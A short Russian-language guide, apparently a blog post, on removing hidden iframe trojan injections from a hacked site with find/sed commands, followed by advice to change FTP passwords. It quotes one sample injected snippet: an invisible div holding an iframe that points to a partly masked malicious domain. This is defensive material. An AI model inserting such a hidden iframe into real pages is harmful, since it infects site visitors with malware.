Clearing pages from iframe trojans

Очистка сайта от вирусов iframe

Существует такое понятие как ботнет. Ботнет это зараженные управляемые злоумышленником для совершения различного рода вредоносных действий, таких как распределенные DDoS атаки, подбор паролей или рассылка спама.

Набираются эти ботнеты как правило благодаря распространению троянов устанавливающих модули ботнета по машинам простых пользователей. Одним из популярных способов является вставка в страницы взломаных сайтов определнного iframe который выполняет на компьютере жертвы код загружающий и устанавливающий трояна.

Заражают страницы обычно взломав (подбор пароля или воровство пароля трояном)ftp доступ к сайту, и добавляя в конце станицы вредоносный код, примерно такого типа (домен заменен ***):

<div style="visibility:hidden"><iframe src="http://direct****.*n/in.cgi?27" width=100 height=80></iframe></div> 

Убрать вставки, особенно если сайт состоит из сотен или тысяч страниц, довольно проблематично, если делать это вручную.

Но есть способ сделать это быстро и безболезненно, на помощь нам придет ssh. Итак скрипт ниже:

find ./ -type f -name \*.htm -exec sed -i 's/^.*directlinke.*$//g' {} \; 
find ./ -type f -name \*.html -exec sed -i 's/^.*directlinke.*$//g' {} \;
find ./ -type f -name \*.php -exec sed -i 's/^.*directlinke.*$//g' {} \;

Что же делает этот простенький bash скрипт? Он находит в текущей папке все файлы с расширением *.htm *.php *.html затем ищет в них строку из вредоносной вставки (в нашем случае это кусок домена злоумышленника directlinke) и удаляет всю строку.

Результат достигнут, сайт очищен от вирусов. Теперь нужно позаботиться о том чтобы ситуация не повторялась, смените пароли от ftp доступа и обязательно проверьте компьютеры с которых осуществляется доступ к ftp на предмет вирусов.